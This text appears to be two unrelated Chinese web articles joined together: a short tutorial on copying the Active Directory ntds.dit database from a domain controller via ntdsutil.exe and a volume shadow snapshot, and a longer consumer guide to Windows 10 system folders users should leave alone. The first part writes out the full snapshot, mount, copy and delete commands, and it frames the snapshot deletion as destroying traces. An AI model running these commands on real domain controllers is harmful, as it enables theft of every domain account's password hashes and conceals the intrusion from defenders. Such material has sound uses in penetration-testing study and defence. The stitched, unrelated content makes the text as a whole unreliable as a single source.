在通常情況下,即使擁有管理員權(quán)限,也無法讀取域控制器中的ndts.dit文件, 但是我們又非常想獲得這個(gè)文件的內(nèi)容,這個(gè)時(shí)候就需要使用windows本地卷影拷貝服務(wù)VSS。在活動目錄中,所有的數(shù)據(jù)都保存在ntds.dit文件中,ntds.dit是一個(gè)二進(jìn)制文件,包含用戶名、散列值、組、GPP、OU等與活動目錄相關(guān)的信息,它和SAM文件一樣,被windows系統(tǒng)鎖死。卷影拷貝服務(wù)VSS,本質(zhì)上屬于快照技術(shù)的一種,主要用于備份和恢復(fù),即使文件當(dāng)前處于鎖死狀態(tài)。
本篇介紹:通過ntdsutils.exe提取ntds.dit
ntdsutils.exe是一個(gè)為活動目錄提供管理機(jī)制的命令行工具,使用ntdsutils.exe可以維護(hù)和管理活動目錄數(shù)據(jù)庫、控制單個(gè)主機(jī)操作、創(chuàng)建應(yīng)用程序目錄分區(qū)等,該工具默認(rèn)安裝在域控服務(wù)器上,可以在域控制器上直接操作,支持windows server 2003、2008、2012。提取過程分為3步:
第一步:創(chuàng)建快照
ntdsutil.exe snapshot "activate instance ntds" create q q產(chǎn)生的快照GUID為:
{850bc5ab-7620-48fa-bd1f-c23c8150a3f0}第二步:加載快照
快照位置:C:$SNAP_202009222211_VOLUMEC$\
ntdsutil.exe snapshot "mount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q第三步:復(fù)制快照中的ntds.dit文件
copy 'C:$SNAP_202009222211_VOLUMEC$\Windows\NTDS\ntds.dit' C:\ailx10\ntds\ntds.dit我們要銷毀痕跡,所以要刪除快照,這里也可以三步來安定自己的內(nèi)心:
第一步:查看
ntdsutil.exe snapshot "List All" q q第二步:銷毀
ntdsutil.exe snapshot "umount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" "delete {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q第三步:再查看(確定全部刪除成功)
本篇完~
除了你的個(gè)人文件和文件夾,計(jì)算機(jī)中還包含Windows本身創(chuàng)建的大量數(shù)據(jù),這會占用大量空間。如果稍加努力并進(jìn)行搜索,你將找到足夠數(shù)量的不影響系統(tǒng)性能的臨時(shí)文件。
但是,除非絕對必要,否則你不應(yīng)更改其他文件和文件夾。刪除該數(shù)據(jù)可能導(dǎo)致系統(tǒng)不穩(wěn)定、文件丟失以及其他無法預(yù)料的后果。下面這6個(gè)你絕不應(yīng)該觸摸的默認(rèn)Windows 10文件夾,一定要注意了。
位置: C:\Program Files, C:\Program Files (x86)
每當(dāng)通過運(yùn)行setup.exe文件安裝應(yīng)用程序時(shí),安裝程?序都會在Program Files文件夾中創(chuàng)建一個(gè)目錄,將值添加到注冊表中,并執(zhí)行其他必要的任務(wù)以使其正常運(yùn)行。因此,如果查看Program Files文件夾,將可以找到計(jì)算機(jī)上安裝的大多數(shù)程序的目錄。
除極少數(shù)情況外,切勿觸摸這些目錄中的程序數(shù)據(jù)。它們包含程序運(yùn)行所需的配置信息。如果更改了某些內(nèi)容,則可能會損害文件的完整性,這將導(dǎo)致需要重新安裝該應(yīng)用程序。
如果要正確卸載程序,則應(yīng)使用設(shè)置菜單的“應(yīng)用和功能”。它只會從Program Files文件夾中刪除應(yīng)用程序目錄,不會從系統(tǒng)中刪除指向該應(yīng)用程序目錄的其他鏈接,也不會刪除其他目錄和注冊表中的其余文件。
如果使用的是32位版本的Windows,則只能安裝32位應(yīng)用程序,并且磁盤上只有一個(gè)Program Files文件夾。在Windows的64位版本上,還有另一個(gè)Program Files(x86)文件夾。它安裝32位程序,而64位程序存儲在常規(guī)Program Files文件夾中。
位置: C:\Windows\System32
幾乎所有系統(tǒng)數(shù)據(jù)都存儲在C:\Windows\文件夾中,但是System32目錄值得特別注意。它包含數(shù)百個(gè)DLL文件以及許多程序,這些文件對于系統(tǒng)正常運(yùn)行至關(guān)重要。
例如,可以找到負(fù)責(zé)計(jì)算機(jī)上聲音操作的服務(wù),正確引導(dǎo)Windows所需的文件,負(fù)責(zé)正確顯示字體的資源等等。此文件夾還包含標(biāo)準(zhǔn)Windows程序的可執(zhí)行文件。例如,calc.exe可讓你啟動計(jì)算器,而cmd.exe可讓你啟動Windows指令行。
顯然,由于此文件夾對于Windows操作至關(guān)重要,因此不顧后果地修改其中的文件可能會使整個(gè)系統(tǒng)癱瘓。
位置:C:\pagefile.sys
計(jì)算機(jī)內(nèi)部的內(nèi)存負(fù)責(zé)臨時(shí)存儲所有正在運(yùn)行的應(yīng)用程序的數(shù)據(jù)。例如,當(dāng)你打開Word時(shí),程序本身和必要的數(shù)據(jù)將放置在內(nèi)存中。這就是為什么存在大量內(nèi)存可以讓你輕松地同時(shí)在許多程序中工作的原因。
如果物理內(nèi)存已滿,Windows將開始使用頁面文件。這是磁盤的專用部分,其作用類似于內(nèi)存。如果你的計(jì)算機(jī)安裝了足夠的內(nèi)存,則你不太可能看到頁面文件大小如何增加。但是,使用此文件會降低設(shè)備的性能,因?yàn)閮?nèi)部存儲比內(nèi)存慢。
如果檢查此文件的大小,可能會看到幾GB的大小。當(dāng)然,你可以禁用分頁文件的使用以釋放空間,但這不是一個(gè)好主意。沒有分頁文件,當(dāng)內(nèi)存填滿時(shí),程序可能會停止運(yùn)行,因?yàn)樗鼈儫o法訪問額外的內(nèi)存。
Windows允許你根據(jù)需要手動管理虛擬內(nèi)存,但大多數(shù)用戶應(yīng)允許操作系統(tǒng)自行執(zhí)行此操作。如果你在使用少量內(nèi)存時(shí)遇到問題,那么最好的解決方案是購買一個(gè)內(nèi)存條添加上。
位置:C:\System Volume Information
另一個(gè)大文件夾(目的不是很明顯)是系統(tǒng)卷信息。實(shí)際上,它包含一些Windows功能的正確操作所需的文件。在大多數(shù)情況下,當(dāng)你嘗試打開此目錄時(shí),Windows只會顯示警告:“訪問被拒絕”。
該目錄包含備份文件和系統(tǒng)還原點(diǎn),可用于將不需要的更改回滾到系統(tǒng)。當(dāng)然,你可以減小此文件夾的大小或完全關(guān)閉“系統(tǒng)還原”。為此,請?jiān)谌蝿?wù)欄“搜索”框中搜索“創(chuàng)建還原點(diǎn)”,然后按Enter。在出現(xiàn)的窗口中,單擊“配置”按鈕,然后指定所需的參數(shù)。
除了系統(tǒng)還原點(diǎn),“系統(tǒng)卷信息”目錄還包含文件索引數(shù)據(jù)。沒有它們,系統(tǒng)中的搜索可能會非常緩慢。另外,此文件夾用于卷影復(fù)制服務(wù),該服務(wù)負(fù)責(zé)備份。
與其他重要文件夾一樣,你不應(yīng)更改此文件夾的內(nèi)容。不要嘗試強(qiáng)制訪問以刪除文件-Windows需要此數(shù)據(jù)才能正常運(yùn)行,并且普通用戶沒有理由更改它。
位置:C:\Windows\WinSxS
WinSxS文件夾表示W(wǎng)indows Side By Side(并排),創(chuàng)建它是為了解決與不同版本的Windows兼容的問題。口語術(shù)語DLL Hell(Hell DLL)是動態(tài)連接的dll(dll)發(fā)生沖突、重復(fù)或中斷時(shí)的最佳用語。
為了解決這些問題,微軟開始使用WinSxS文件夾收集許多DLL的多個(gè)版本,并在需要它們來運(yùn)行特定程序時(shí)按需下載它們。例如,當(dāng)程序需要訪問Windows不再包含的DLL的過時(shí)版本時(shí),這可以提高兼容性。
使用Windows的時(shí)間越長,此文件夾就變得越大。你可能已經(jīng)猜到了,刪除此目錄中的文件是個(gè)壞主意。你不應(yīng)直接修改其中的文件,而應(yīng)使用“磁盤清理”工具或系統(tǒng)設(shè)置的“系統(tǒng)--存儲”部分。
位置:C:\ Users \ [用戶名] \ AppData \ Local
最后介紹的這個(gè)文件夾對于操作系統(tǒng)任務(wù)的重要性不如上述其他目錄重要,但許多用戶可能仍對它的用途感到疑惑。D3DSCache是??一個(gè)目錄,其中包含Microsoft Direct3D API的緩存信息。
它是DirectX的一部分,用于在游戲和其他應(yīng)用程序中顯示圖形。通常情況下,不應(yīng)修改此文件夾中的文件,尤其是因?yàn)樗鼈儍H占用幾兆字節(jié)。但是,如果你在游戲中遇到問題,那么清除此緩存可能是一個(gè)不錯的解決方案。但是,不要盲目刪除文件。
Windows隱藏了很多文件夾,并且有很多原因。普通用戶沒有理由直接修改這些目錄的內(nèi)容,因?yàn)閃indows提供了多種工具來管理這些文件而不會直接損害系統(tǒng)。
如果你在計(jì)算機(jī)上發(fā)現(xiàn)一個(gè)奇怪的隱藏文件夾,請不要急于刪除它。首先,在Internet上找到有關(guān)它的信息,以免損害計(jì)算機(jī)的性能。另外,請不要忘記定期備份,以免出現(xiàn)問題時(shí)可以恢復(fù)丟失的數(shù)據(jù)。
更多windows 10操作系統(tǒng)使用技巧,請關(guān)注→→#win10玩機(jī)技巧#
想了解更多精彩內(nèi)容,快來關(guān)注 @微課傳媒
1.頭條號【微課傳媒】專注軟件分享,如果你喜歡玩軟件,歡迎關(guān)注、評論、收藏、轉(zhuǎn)發(fā)。
2.在學(xué)習(xí)中有什么問題,歡迎與我溝通交流,號搜索【微課傳媒】,我在這里等你喲!